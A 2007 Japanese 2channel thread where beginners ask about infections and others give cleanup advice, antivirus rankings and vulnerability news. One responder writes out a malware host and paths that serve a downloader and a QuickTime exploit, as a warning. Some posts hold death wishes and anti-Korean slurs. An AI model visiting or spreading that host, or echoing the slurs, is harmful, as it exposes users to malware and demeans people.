URLリンク(countfuyashi0gokun.blog50.fc2.com)
すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか??
不安で夜も眠れないのでよろしくお願いいたします。
187:名無しさん@お腹いっぱい。
07/05/24 23:18:40
>>186
セキュリティ初心者質問スレッドpart89
スレリンク(sec板:469番)
469 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/05/24(木) 23:02:57
URLリンク(countfuyashi0gokun.blog50.fc2.com)
すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか??
不安で夜も眠れないのでよろしくお願いいたします。
誘導されただろ 貼ってもらわないと行けないなら踏め
勇気がなくて踏めない人のための鑑定スレPart14
スレリンク(hack板)
188:名無しさん@お腹いっぱい。
07/05/24 23:23:04
541 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/05/24(木) 23:06:48
URLリンク(countfuyashi0gokun.blog50.fc2.com)
わけのわからないページを踏んでしまいました。このページ内に何か問題はありますでしょうか?
ワープとかいう所がひたすら重かったです・・・。
よろしくお願いいたします。
どれだけマルチするつもりか知らんけど
フラッシュ再生するだけだから勝手に踏んだらいい
189:名無しさん@お腹いっぱい。
07/05/24 23:28:07
セキュ板に常駐してる人間をなめてんな
マルチしてもばれないと思ったら大間違いだつうの
190:名無しさん@お腹いっぱい。
07/05/25 01:16:46
新種ルートキット情報
スレリンク(sec板:410番)
191:名無しさん@お腹いっぱい。
07/05/25 03:17:13
AV-Test.orgという専門機関のアンチウイルス検知力テスト結果(2007年05月22日)
AV-Test.org Reports Stats from Antivirus Roundup
URLリンク(www.pcmag.com)
01位)WebWasher 99.83%
02位)AVK 2007 99.56%
03位)AntiVir 99.42%
04位)F-Secure. 97.93%
05位)Symantec 97.77%
06位)Kaspersky 97.64%
07位)Fortinet. 97.06%
08位)Avast!. 96.32%
09位)AVG. 96.15%
10位)Rising 96.02%
11位)BitDefender 95.68%
12位)Norman.. 94.66%
13位)Ikarus.. 92.54%
14位)Panda. 92.09%
15位)Trend Micro.. 90.97%
16位)Nod32. 88.32%
192:名無しさん@お腹いっぱい。
07/05/25 16:30:13
厨な質問なんだがyoutubeとかニコニコとかの動画サイトでウィルスとかあんの?
193:名無しさん@お腹いっぱい。
07/05/25 16:36:47
>>192
それが人に物をたずねる態度か
死ねクズ蟲
ゴミ収集車に巻き込まれて 頭粉砕されて死ね
194:名無しさん@お腹いっぱい。
07/05/25 19:26:51
まさにそうなって欲しいアホがレスしてるのがなんとも言えないねぇ…
195:名無しさん@お腹いっぱい。
07/05/25 19:28:26
あるある
196:名無しさん@お腹いっぱい。
07/05/25 19:29:13
ねぇねぇ
197:名無しさん@お腹いっぱい。
07/05/26 00:58:03
※アンチウイルスNOD32の脆弱性情報
スレリンク(sec板:540番)
198:名無しさん@お腹いっぱい。
07/05/27 12:13:05
マルウェア注意
マカフィー・ユーザーのブログに、
ワードパッドなどで簡単に埋め込める悪質なオブジェクトがあることが紹介されていたのでご注意です。
マイクロソフトやマカフィー、シマンテック(ノートン)、kasperuskyなどの
多くの主要なベンダーは、既に対応していますが、
アンラボやNOD32など一部のベンダーは、まだ未対応なので気をつけて下さい。
*マカフィー・ユーザーの検証ブログ
URLリンク(www.avertlabs.com)
199:名無しさん@お腹いっぱい。
07/05/27 13:56:00
ユーザーのブログじゃねーよ。
AVERTはMcAfeeの解析チームだ。
200:名無しさん@お腹いっぱい。
07/05/27 22:08:01
単にOLEで埋め込んだだけのように思うのだが・・・
いったい何が危険なんだ?
201:名無しさん@お腹いっぱい。
07/05/27 22:13:05
メールの添付ファイルとして届く→興味を誘うような文章を書く。
クリックするほうがアホwとか言うならワンクリやフィッシングも対策いらん。
ま、そのブログのエントリはあくまで技術的なネタであって、
トロイとして実用的かどうかは本題じゃないでしょ。
202:名無しさん@お腹いっぱい。
07/05/28 10:56:49
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 「internet security 2006(7かも?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新しています」
【スパイウェア対策ソフト】 「上記のセキュリティソフトにて」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「上記のセキュリティソフトにて」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も検出されず、昨日から突然『セキュリティリスクWscript.kakwormを検出して遮断しました』のようなメッセージが、5分未満の間隔で限りなく・・・」
【どんな症状が出るか】 「例)\Content.IE5\9NJV9DS6\api[1].xml、からWscript.kakwormが検出されて、上記のエラーが。」
【症状が出る前に何をやったか】 「いつもどおりで、これといって特別なことはしていません」
【症状を解決しようとどのような処置を取ったか】 「content.IE5の中のファイルをindexを除き削除しました」
【その他の質問】 「」
content.IE5の中のファイルをindexを除き削除すると、昨夜収まったのですが、
先ほど突然昨夜と同様の症状が・・・。
よくよくcontent.IEを見ていると、消してIEも何も起動していないのに
ファイルが次々出現します・・・(これは正常なのかな?)
すみません、質問しておいて申し訳ないのですが、これから病院にいかなくてはならないので、
どなたか読んでお答えいただければ幸いです
203:202
07/05/28 12:37:53
ただいま戻りました。
セキュリティソフトのログを確認したところ、
content.IE5を空にしてから病院に行っている間は
上の症状は出ていなかったみたいです。
しかし、やはりcontent.IE5の中にいくつか、HPの読み込みなどをしていないのに
消してもすぐ出てくるファイルやフォルダが10個強あります。
これについて知っている方がいれば教えていただけますでしょうか?
204:名無しさん@お腹いっぱい。
07/05/28 17:24:33
>>202
URLリンク(www.symantec.com)
205:202
07/05/28 18:05:21
>>204
返信ありがとうございます
その辺は自分でも探して既に対策を講じてみたのですが
ファイルどころかレジストリも存在しなかったので、
そのページの通りにやっても変化はありませんでした。
何もしていないのに、content.IE5に勝手にファイルが作成されるところが
個人的には変な感じがするのですが、そういう状態について
知っている方がいれば、教えていただければと
206:名無しさん@お腹いっぱい。
07/05/28 18:35:29
>>205
NIS以外のソフトでスパイウエアスキャン。
「何もしていない」という時のプロセスをチェック・接続ログをチェック。
IEのウインドウを表示させなくても通信はできる。
207:202
07/05/28 19:52:57
>>206
なるほど
とりあえず何かしらの手段を使ってスパイウェアのスキャンをかけたいと思います。
208:名無しさん@お腹いっぱい。
07/05/28 21:59:53
WORM_SDBOT.EFHが消せません。
タスクでそのプロセスを終了しようとしても終了できませんでした。
このウイルスが削除できなくて、昨日、再インストールしたのですが、
今日の夕方に、すでに同じウイルスに感染。
環境は、CATV、ウイルスバスター2007使用です。
再インストールをもう一度してもいいけど感染経路がわかりません。
本日逝った先は、yahooとヤフオク関連のみ。
どうしていいかわかりません。
詳しい方お願いします。
209:名無しさん@お腹いっぱい。
07/05/28 22:14:09
WORM_SDBOT.EFH
侵入方法:共有フォルダ内に自身のコピーを作成して侵入
セキュリティホールの利用:MS00-035
>感染経路がわかりません
ふ~ん。わからないんだーw
210:名無しさん@お腹いっぱい。
07/05/28 22:36:22
リッチテキストマルウェアがウイルス対策ソフトの盲点を突く?
URLリンク(www.itmedia.co.jp)
今時分はどうだろ?どこが×でどこが○とはかかれてないけどさ
211:名無しさん@お腹いっぱい。
07/05/28 22:38:40
PCに共有フォルダは設定していません。
209さんのレスされたことはTREND MICROに書かれてました。
212:名無しさん@お腹いっぱい。
07/05/28 22:52:09
>>211
管理共有は?
213:名無しさん@お腹いっぱい。
07/05/31 02:04:34
すいませんがどなたか教えてください。
先程、2チャンの動画を見てたら(downloadはしてないです
ハードウェアに不具合がありますみたいな感じのコメントと
英語のコメントが出てきて、エラーになり電源が落ちては再起動になるの繰り返しなんですがウィルスですよね?
素人ですいません。
214:名無しさん@お腹いっぱい。
07/05/31 02:08:59
>>213
>みたいな感じのコメントと
>英語のコメントが
>エラーになり
全部書けw
ウィルスだと思うならスキャンしなされ
215:名無しさん@お腹いっぱい。
07/05/31 02:14:28
スキャンしたいのですが起動してから何をしようにもすぐに電源が落ちてしまい又再起動の繰り返しなんです。
素人でうまく説明できずに本当に申し訳ないです。
216:名無しさん@お腹いっぱい。
07/05/31 02:16:24
>>215
SafeModeで起動後システムの復元では?
217:名無しさん@お腹いっぱい。
07/05/31 02:29:24
すいません。
そのモードはどの様にすればよろしいのでしょうか?
218:名無しさん@お腹いっぱい。
07/05/31 02:31:40
>>217
再起動時にF8を連打!
219:名無しさん@お腹いっぱい。
07/05/31 02:32:21
F8あたりを起動後に連打
詳細はPCの取説(多少機種によって相違あり)
220:名無しさん@お腹いっぱい。
07/05/31 02:40:32
連打してみたら英語の画面になり、f1キーf2キーが何たらと出てきましたがこれのことでしょうか?
後、起動してから落ちるまでの間に、右したの方にユアcomputer インフェクテッド?と書いた題名でアンチスパイゥェア フォーユーみたいな英語が出てくるのですが何でしょうか?
意味わからなくてすいません。
221:名無しさん@お腹いっぱい。
07/05/31 02:42:05
>>220
テンプレ埋めれ、嫌ならリカバれ
222:名無しさん@お腹いっぱい。
07/05/31 02:45:58
>>220
URLリンク(www.higaitaisaku.com)
223: ◆N9P3SuvBPo
07/05/31 18:37:59
>213
まだ生きてる?
2チャンの動画じゃなくて、youtubeで動画じゃないのか。
ま、症状見るからにして、マルウェアにやられてるってことには違いないが。
224:名無しさん@お腹いっぱい。
07/06/02 14:37:35
>>210
元ねたのマカフィーのブログにはVirusTotalのスクリーンショット載ってるよ
参加してないベンダーの対応状況はわかんないけど
225:名無しさん@お腹いっぱい。
07/06/02 18:05:01
URLリンク(www.av-comparatives.org)
URLリンク(www.itmedia.co.jp)
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」(ESET)は、68%の確率で新しいマルウェアサンプルを検出した。
226:名無しさん@お腹いっぱい。
07/06/03 13:28:38
最近またNODの工作員必死だなw
そんな事してる暇あったら、新 種 の 未 対 応 ウ イ ル ス どうにかしろよw
NOD未対応ウイルスが世界中に溢れてますよw
他社は、ほとんど対応してるのにねw
NODみたいな糞AVがあると、それを使っている馬鹿信者がウイルス広げて迷惑です><
人の迷惑考えないで糞NOD薦める暇あったら、早く氏んでください。
227:名無しさん@お腹いっぱい。
07/06/03 13:51:13
マルチは基地外の証
228:名無しさん@お腹いっぱい。
07/06/03 13:57:02
いちいち反応するのが一番の基地外
229:名無しさん@お腹いっぱい。
07/06/03 14:17:11
反応する方がキチガイってどういう詭弁だよ
低脳は言うことが違うな
230:名無しさん@お腹いっぱい。
07/06/03 14:23:57
基地外 詭弁 低脳
┏┳┓ ハイッ. ┏┳┓
┏┫┃┃ 差別は ┃┃┣┓
┃┃┃┣┓ ここまで ┏┫┃┃┃
┃ ┃┃┏━━┓┃┃ ┃
┃ 差別 ┣┫ ・∀・ .┣┫ ダメッ.┃
┗━━┛┗┳━┳┛┗━━┛
┏┻┓┃
┏━┛ ┣┻┓
┗━━┫ ┗━┓
. ┗━━┛
231:名無しさん@お腹いっぱい。
07/06/03 14:27:10
認定厨がよく言うw
232:名無しさん@お腹いっぱい。
07/06/03 14:28:52
____ ( ) 。
〃  ̄ ヾ、 ( ) )
i!_,.┻ 、!i_ ノノ
/o  ̄ ̄ ノ ノ
. i.0 .イ
. ゝ_____.ノ
233:名無しさん@お腹いっぱい。
07/06/03 17:49:04
朝鮮人の手法です。根拠のないものでも、言い続ける。
面倒だし馬鹿馬鹿しいと反論せず放置してくれれば、
知らない人にとってはそういうものかと感じられるようになり、
それが事実だと認識されるようになる。
234:名無しさん@お腹いっぱい。
07/06/03 20:27:27
と、NOD厨の糞チョンが言ってます。
おまえら在日はまず、年金や税金を俺ら日本人並みにちゃんと払え
屑ゴキブリ氏ね
235:名無しさん@お腹いっぱい。
07/06/03 20:34:24
板違いだ。消えろ。
236:名無しさん@お腹いっぱい。
07/06/03 21:22:51
RTF埋め込み型早速出てきてるみたいだな
URLリンク(www.trendmicro.co.jp)
237:名無しさん@お腹いっぱい。
07/06/04 15:00:35
Trojan.Packed.NsAntiが削除できないんですがどうすればいいでしょうか。
ウィルスソフトはノートンアンチウィルス2006です。
238:名無しさん@お腹いっぱい。
07/06/04 15:03:09
>>237
URLリンク(www.symantec.com)
239:名無しさん@お腹いっぱい。
07/06/04 15:19:47
>>238
すいません読んだのですがよくわかりませんでした。
何をしたらいいんでしょうか。
240:名無しさん@お腹いっぱい。
07/06/04 15:29:00
Trojan.Packed.NsAnti として検出されたファイルは、有害である可能性があります。
お使いのコンピュータ上で Trojan.Packed.NsAnti として検出されるファイルを発見した場合、
そのファイルを Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、
「スキャンと配信ウィザードを使用して Symantec Security Response に疑わしいファイルを提出する方法」をご覧ください。
241:名無しさん@お腹いっぱい。
07/06/04 21:54:55
新種のpackerか
242:名無しさん@お腹いっぱい。
07/06/05 02:49:54
【使用OS】 「WinXP MCE2002 SP2 PCは1年前にDELLで通販購入」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター12 使用期限○」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「Ad-aware、Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「○」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ウィルス名:JAVA-BYTEVER.AY×3
ANICMOO.GEN×7
ファイル名:
JAVA-の3つのファイル名は「BaaaaBaa.class」「Baaaaa.class」「VaaaaaaaBaa.class」で拡張子がzipに
なっていました。ANICMOO.GEN×7の方は、拡張子がhtmでした。
【どんな症状が出るか】
ネットのページが見れなくなったりすることがあります、時間をおくか再起動するとまた
見れるようになる。見れないときは時間を置いてもずっと見れなくなる…翌日は見れることを
祈るしか…の状態です。
【症状が出る前に何をやったか】
「海外エロアニメサイトへの直リンページを片っ端から覗いていきました
【症状を解決しようとどのような処置を取ったか】
被害対策の部屋での基本的な事を全部、ルータの異常かもとサポセンに確認
結果ルータの異常ではなくPCの異常の可能性有。システムの復元でも症状治らず。
ウィルス検出時に隔離できなかったファイル達です。隔離してあるものは削除しました。
隔離できなかったこれらのファイルはどのようにして削除するものなのでしょうか…?
直接ファイルが潜んでいる場所を触ってみたりすると危険の様な気がして、直接的に
何もしていません…。どうかアドバイスお願いします
243:名無しさん@お腹いっぱい。
07/06/05 09:30:14
>>242
検出されてるのは、すでにパッチの出てるセキュリティホール狙いのものだから
Microsoft Updateが最新になっていればこいつらは発動しない
隔離できなかったのはブラウザとファイルの取り合いしてたからってパターンが多いんで
ブラウザのキャッシュクリアしてからもう一度スキャン
隔離できなかったこいつらが症状と直接関係ある可能性は小さいと思うが
「海外エロアニメサイトへの直リンページを片っ端から覗いていきました」だからなぁ…
「被害対策の部屋での基本的な事を全部」ってのはなにをどこまでした?
244:名無しさん@お腹いっぱい。
07/06/05 16:02:05
>>225
今回AV-Comparatives.orgのプロアクティブ試験のランク付けは、
一般消費者には、あまり意味のないもの。
ランク付けで最も重視された基準は、本物のウイルスの検出数ではなく、誤検出の数。
URLリンク(www.av-comparatives.org)
↑
この資料の6ページ目に、誤検出数の具体的な個数が書いていましたが、。
Fortinetという製品(1000以上の誤検出)以外は、
全サンプル中で、たった0個から36個の誤検出に過ぎませんでした。
実際のユーザー環境では、誤検出してもベンダーに真偽を確認すれば済むが、
本物のウイルスを検出できないのは致命的です。
今回からのプロアクティブ性能のランク付けでは、
誤検出が18個で、本物のウイルスを14628個できている製品よりも、
誤検出は8個でも、本物のウイルスは5659個しか検出できていない製品の方がランクが上となっています。
245:名無しさん@お腹いっぱい。
07/06/05 16:54:42
レスありがとうございました。
>243
URLリンク(www.higaitaisaku.com)
の、PCのお掃除、スパイウェア除去、転ばぬ先の杖等です。
Hijackthisでログ取っての質問をして(#91093)、色々指示されたことも
ありますが、解決には至らず…。PCメーカーのサポセンに電話しても、
色々指定されたことをしても効果なしで、再インストールしてくだサイといわれました。
キャッシュクリア後のスキャンも効果なしでした。
246:242
07/06/05 16:57:09
すいません、キャッシュクリアってインターネットオプションの
一時ファイルの「Cookieの削除」と「ファイルの削除」のことですよね…?
247:名無しさん@お腹いっぱい。
07/06/05 20:26:09
★ 世界でもっとも権威のある機関 AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日) ★
URLリンク(www.pcmag.com)
01位)WebWasher 99.83% (605,846)
02位)AVK 2007 99.56% (604,255)
03位)AntiVir 99.42% (603,408)
04位)F-Secure. 97.93% (594,333)
05位)Symantec 97.77% (593,355)
06位)Kaspersky 97.64% (592,606)
07位)Fortinet. 97.06% (589,028)
08位)Avast!. 96.32% (584,574)
09位)AVG. 96.15% (583,541)
10位)Rising 96.02% (582,772)
11位)BitDefender 95.68% (580,700)
12位)Norman.. 94.66% (574,476)
13位)Ikarus.. 92.54% (561,607)
14位)Panda. 92.09% (558,899)
15位)Trend Micro 90.97% (552,107)
16位)Nod32. 88.32% (536,043) ←←←←←←←←←←←←←←←←←←←←←←←←←←←←
17位)McAfee 87.28% (529,680)
★ A v a s t ! 、A V G, ウ イ ル ス キ ラ ー 、 バ ス タ ー より格段に検出力が劣る
N O D 3 2 (笑)
248:名無しさん@お腹いっぱい。
07/06/05 20:29:21
■NOD32が該当すると思われる専門家の指摘
URLリンク(internet.watch.impress.co.jp)
>ただし、「マイナーなベンダーの検知率が高いというわけではない。中には、ヒューリステックに頼りすぎて、
>ウイルスの検体を集めず、ちゃんとシグネチャを作らないところもある」と補足した。
■新種マルウェアの検出もほとんど駄目
スレリンク(sec板:404番)
■新種ルートキットの検出も駄目
スレリンク(sec板:410番)
249:名無しさん@お腹いっぱい。
07/06/05 21:29:26
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ6.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されています」
【スパイウェア対策ソフト】 「Ad-aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「自分のHPを見ると『疑わしいHTTPオブジェクト
<URLリンク(81.95.149.28) にトロイ 「Trojan-Downloader.JS.Psyme.gr」を検知しました』
と表示されます」
【どんな症状が出るか】「同上」
【症状が出る前に何をやったか】 「いつも見ているサイトから同じトロイが検知されました」
【症状を解決しようとどのような処置を取ったか】 「カスペルスキーを導入・PC内のウイルスを全削除、AD-awareSEでスパイウェアを一掃」
【その他の質問】 「現在脅威はありませんと表示されているのに何故か自分のHPからはトロイが検知されています。
最近になってネットが重くなったのもこのせいでしょうか?
ウイルスに関しては右も左もわからない状態で辟易しています。どうにか自サイトからウイルスが検知されないようにしたいのですがお願いします。」
250:名無しさん@お腹いっぱい。
07/06/05 21:54:29
URLリンク(www.av-comparatives.org)
URLリンク(www.itmedia.co.jp)
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」(ESET)は、68%の確率で新しいマルウェアサンプルを検出した。
251:名無しさん@お腹いっぱい。
07/06/05 22:18:05
●「PC WORLD」によるNOD32の評価
URLリンク(www.pcworld.com)
"NOD32's overall malware detection rate wasn't stellar, however. When pitted against AV-Test.org's nearly 900,000-strong "zoo"
of Trojans, viruses, and other malware, NOD32 caught only 90 percent, compared to the 96 percent rate of top performers Kaspersky Anti-Virus 6,
Symantec Norton AntiVirus 2007, and BitDefender Antivirus 10. It fared surprisingly poorly with 32-bit Windows viruses (approximately 1 in 11 samples in the zoo), catching only 73 percent.
In disinfection tests, NOD32 cleaned up all malware files but missed resulting changes to the Hosts network settings
file and most of the less-important Registry changes, for a disappointing 55 percent success rate."
しかしながら、NOD32のマルウェアの総合的な検出力はより優れているとはいえない。
AV-Test.orgのトロイ、ウイルス、その他のマルウェアなどの"約90万の"zoo"の検体に対しては、
優秀なカスペルスキー、ノートン、BitDefenderなどが検出率96%の成績を占めるのに比べ、NOD32はたったの90%しか検出しなかった。
情けないことには、32ビットのWindowsウイルスに至っては、たったの73%と驚くほど検出性能が低かった。
除去テストでも、すべてのマルウェアを取り除くことができたが、がっかりしたことには、ホストのネットワークの設定ファイルや
比較的重要ではないレジストリの変更に対しては、55%しか駆除できなかった。
252:名無しさん
07/06/05 22:22:47
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 「ウィルスバスター」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「ウィルスバスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「○」
【ルータの有無】 「?」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Neroってソフトについてたウィルス(名前わかりません)」
【どんな症状が出るか】 「タスクマネージャーが開けず、
レジストリをいじって直そうと思っても直せない。
(起動すると
このファイルはほかのプログラムでつかわれています。とでます。)」
【症状が出る前に何をやったか】 「友達からファイル共有ソフトを
使って入手したソフトをもらった。」
【症状を解決しようとどのような処置を取ったか】 「レジストリを起動」
【その他の質問】 「」
初心者であんまりわかりませんがよろしくお願いします。
253:名無しさん@お腹いっぱい。
07/06/06 01:53:29
>>249
「自分のHP」のURLを書いて欲しい
回答に必要な情報なんで
>>252
ご愁傷様。その友達とやらを恨んであげてください
254:名無しさん@お腹いっぱい。
07/06/06 04:15:52
>>252
>>13
255:名無しさん@お腹いっぱい。
07/06/06 07:27:28
>>249
ほぼ確実なこと
あなたのサイトが改竄されており、閲覧する人を危険にさらしている。
わからんこと
あなたも感染している。
サイトの該当するiframe(だと思う)を取り除く。
サーバのOSやWebサーバやCGI等に脆弱性が無いかを
(必要ならサーバ管理者に)確認し対処する。
先方がPHPを使っていることからphpBB等は特に注意。
あるいはサイトを(一時的にしろ恒久的にしろ)閉鎖する。
ドメインは中米パナマ。
中南米によくある欧米の銀行口座を狙ったプロの犯行と思われる。
exe以外にQuickTimeのリスト(McAfeeいわくMS06-006)も降ってくる。
256:名無しさん@お腹いっぱい。
07/06/06 07:39:57
追記
81.95.149.28/logo/file.php
振ってくるのはfile.exe。小さいのでたぶんDownloader。
AntiVir、AVG、Kaspersky、McAfeeなどで捕獲可能。
81.95.149.28/logo/qt.php
降ってくるのはmovie.qtl。
QuickTimeの脆弱性を狙うものと思われるファイル。
McAfeeがMS06-006判定(MS06-006はWinowsMediaPlayerだけど)。
QuickTimeはアップデートしていない人もいると思うので注意。
ディレクトリの logo を try にしても似たような物(同じではない)が降ってくる。
257:名無しさん@お腹いっぱい。
07/06/06 09:35:14
>>245-246
キャッシュのクリアはそれでおk
キャッシュクリア後のスキャンも効果なしってのは
隔離されなかったファイルが検出され続けるってこと?
それならファイルのパス書いてみてくれ
あと、ページを見られないときってのはブラウザだけがつながらない?
それともメールとかほかのネットワーク接続も切れるの?
258:242
07/06/06 21:26:06
>257
今は何も検出はされない状態です。
ただ、キャッシュクリア後などした後のスキャンの日付に、隔離できなかった
3つと7つのファイルがログにあるのですが…。今スキャン行っても何も検出されない
のはもう大丈夫ということなのでしょうか…
JAVAの3つがこのような感じです。
C:\Documents and Settings\ユーザー名\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\crtdcghcn.jar-1d0cf4ed-4b0813b9.idx
ANICMOOの7つがこのような感じです。
C:\Documents and Settings\中江心\Local Settings\Temporary Internet Files\Content.IE5\0PMB4PA7\123[1].html
ページが見れない時は全部見れません。2chブラウザも、メール(OfficeOutlook)ネットに関与
する行動が全部できない状態です。また被害対策部屋を読んでからはインターネット一時ファイアル
は閉じる度削除する設定にしてあります。
259:名無しさん@お腹いっぱい。
07/06/07 08:35:38
>>258
BytevarのほうはJAVAのキャッシュだね
これはフォルダたどってって手動で削除可
けど最初とファイル名変わってない?
消しても復活するようなら引き込み役とかいそうだけど
ANICMOOはIEのキャッシュのようだが…消えないってのはどういうことだろう
インターネットオプションで一時ファイルの削除じゃなくて
隣の「設定」ボタンから「ファイルの表示」選択した場合
一覧の中に問題のファイルはある?あれば削除
接続できないのは正直お手上げ状態だけど
ウイルスバスターのパーソナルファイアウォールのログや
Windowsのイベントログにそれっぽいのが残ってたりしない?
260:名無しさん@お腹いっぱい。
07/06/07 20:51:28
>259
拡張子がidxなのは…これのZipは同じフォルダの中には見当たらなかったので
同じファイル名の拡張子がidxがあったので書きました。
隔離できなかったBYTEVARの3つのファイルは、フォルダの場所辿って開いてみても
一応見当たりませんでした、ただ拡張子がidxになってる同一名のファイルが
一つあったというぐらいで…
ANICMOOのほうは、ちょっと今確認することはできないのですけど
どちらも今スキャン行った際には何も検出はされない状態です、隔離できなかった
ウィルスログの日付も一月前程なので…ひょっとしたら記憶違いでIEキャッシュ削除前
だったのかもしれません…ごめんなさい。
とりあえず検出されない今は大丈夫なんでしょうか…?
ファイアウォールログもイベントログも確認していません。
帰ったら確認してみます、初めて知る言葉なんですがイベントログ(コントロールパネル→
管理ツール→イベントビュアー)を開いたものですか?今会社のPCで見ていますが
エラー(赤丸×)マークと、警告マークとあるのですが、もし発見した場合どのような
処置を取るとよいでしょうか?
色々ページ見てるんですがイマイチ分かりません…
261:名無しさん@お腹いっぱい。
07/06/07 22:38:11
>>260
拡張子idxのファイルはJAVAがclassファイルやjarファイルキャッシュするときに
セットでできるものだから本体のほうがなければそれでOK
ANICMOOも検出されないなら現状では問題ない
ファイアウォールもイベントログももしかしたら
つながらないときに特有の現象でも出ててヒントにならないかな~って程度のもので、
あまり深い理由があって訊いた訳でもないんだ、スマン
262:名無しさん@お腹いっぱい。
07/06/09 06:19:35
まだGDI+か。またアイコンか。
Panda Panda URLリンク(blogs.pandasoftware.com)
icoで「画像とFAXビューア」やエクスプローラが0除算落ち。
今のところ攻撃には使えないので放置。
前半のYahoo!Messenger8.0についてはこれもついでに。
Symantec URLリンク(www.symantec.com)
こちらはexploitも公開済み。8.1にアップデートせよ。
もっとも、日本語版は7.0で更新が止まっているので知らん。
263:名無しさん@お腹いっぱい。
07/06/09 07:09:24
質問があります.
mp3ファイルが置いてあるフォルダ内に何かのCDジャケットを隠しファイル(jpg)で生成するウィルスは何て言う名前のウィルスでしたっけ?
よろしくお願いします
264:名無しさん@お腹いっぱい。
07/06/09 17:02:37
眠いさん少し休んだ方がいいんとちゃいますか?
ネット感覚を取り戻してください
265:名無しさん@お腹いっぱい。
07/06/09 22:02:54
URLリンク(www.f-secure.com)
RUNは基本だな
266:名無しさん@お腹いっぱい。
07/06/11 19:17:48
267:名無しさん@お腹いっぱい。
07/06/12 00:55:48
メッセンジャーが起動しない上、ネットに接続できねー。
だが別のユーザーならネットに接続できる…
ウイルスなのかな…?
268:名無しさん@お腹いっぱい。
07/06/12 11:53:01
By the time Virus became self-aware it had spread into millions of computer servers across the planet. Ordinary computers in office buildings, dorm rooms everywhere.
It was software in Microsoft.
There was no system core it could not be shutdown.
The attack began at 6:18 PM, just as he said it would.
Judgment Day, the day the human race was almost destroyed by the weapons they'd built to protect themselves.
I should have realized it was never our destiny to stop Judgment Day, it was merely to survive it, together.
The Terminator knew he tried to tell us, but I didn't want to hear it.
Maybe the future has been written.
I don't know all I know is what the Terminator taught me never stop fighting.
And I never will.
The battle has just begun.
269:名無しさん@お腹いっぱい。
07/06/12 14:47:43
>>268
Delusion without permission
270:名無しさん@お腹いっぱい。
07/06/12 16:54:27
トレンドのオンラインスキャンは、9Xを外したな。
windows9Xはどこまでも使いづらくするつもりか・・・( ´Д⊂ヽ
271:名無しさん@お腹いっぱい。
07/06/13 00:31:55
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新(自動更新で、最終更新日は6/9です)」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されています」
【スパイウェア対策ソフト】 「ウィルスバスター2007」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スパイウェアが3つ」
【どんな症状が出るか】 「自分のHPを見ると、『警告 危険なWebサイトです』というスパイウェアの警告が表示されます。
アドレスは『81.95.149.28/logo/index.php』です。
ファイルマネージャから、該当箇所と思われるiframeを取り除いて再びアクセスすると、
その時は警告は表示されないのですが、翌日アクセスすると再び同じ警告が出て、
確認するとiframeが組み込まれています。
今現在は、ウィルスもスパイウェアも検出されていません。
が、翌日になるとまたスパイウェアが自サイトから見つかる状況です。」
【症状が出る前に何をやったか】 「サイト閲覧
(ブックマークしているサイトばかりで、新しいページは見ていないと思います)」
【症状を解決しようとどのような処置を取ったか】 「ウィルス・スパイウェアの検索と削除」
【その他の質問】 「」
お分かりになる方いらっしゃいましたら、アドバイス頂けないでしょうか?
272: ◆N9P3SuvBPo
07/06/13 00:45:20
>271
今、そこ行って来た。
確かにIframeが埋め込まれてるね。
さらに、iframeで指定されたアドレスに飛んでみると、スクリプトの記述があるね。
しかし、あのvistaでMicrosoftUpdate最新で、対策ソフトも有って、ルータも有る。
それで、サイト閲覧だけでこうなるなんて考えられないな。
もしかして…サイト見ている時、
『実行するにはあなたの許可が必要です』っていう窓が出てきて、それに対して「YES」を押したとか?
…直前で気づくよな、それだと
273:271
07/06/13 01:01:17
>272
